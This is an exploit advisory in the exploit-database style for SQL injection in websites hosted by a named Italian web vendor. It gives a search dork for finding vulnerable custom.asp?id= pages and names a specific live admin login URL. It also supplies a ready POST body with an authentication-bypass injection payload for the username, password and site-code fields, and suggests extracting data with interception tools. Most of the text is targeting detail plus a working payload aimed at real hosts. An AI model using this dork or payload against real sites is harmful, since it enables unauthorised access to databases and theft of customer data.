# Exploit Title: Metaping SQLi
# dork : "site by metaping" custom.asp?id=
# Exploit Author: Arm_Legi (Anonplus, http://anonplus.ezyro.com/)
# Date: 1 July 2018
# Vendor : https://www.metaping.it/
# Version : N/A
# CVE: N/A
# Dbms : MSSQL
Technical Details & Description:
===============================================================================================================================================
A remote sql-injection web vulnerability has been discovered in a web app of https://www.metaping.it/
The vulnerability allows remote attackers to inject own malicious sql commands to compromise the connected web-server or dbms.
The vendor host all the website that they do in the same server!
They host their own subdomain in the same server too : http://web.metaping.it/adm2.asp
===============================================================================================================================================
Request Method(s):
[+] GET
Vulnerable File(s):
[+] custom.asp
Vulnerable Parameter(s):
[+] id
=================================================================================================================================================================================================================================
==================================================================================================================================================================================================================================
The subdomain is Vuln:
http://web.metaping.it/adm2.asp
Type: '=' 'or' in : username , password and codice sito !
you will get and SQL error !
that's mean that u can extract the data with burpsuite or tampr data and perform an sql injection with post method !
data: username=%27%3D%27+%27or%27&password=%27%3D%27+%27or%27&scod=%27%3D%27+%27or%27&area=3&Submit=entra
Request Method(s):
[+] POST
Vulnerable File(s):
[+] adm2.asp
Vulnerable Parameter(s):
[+] username
[+] scod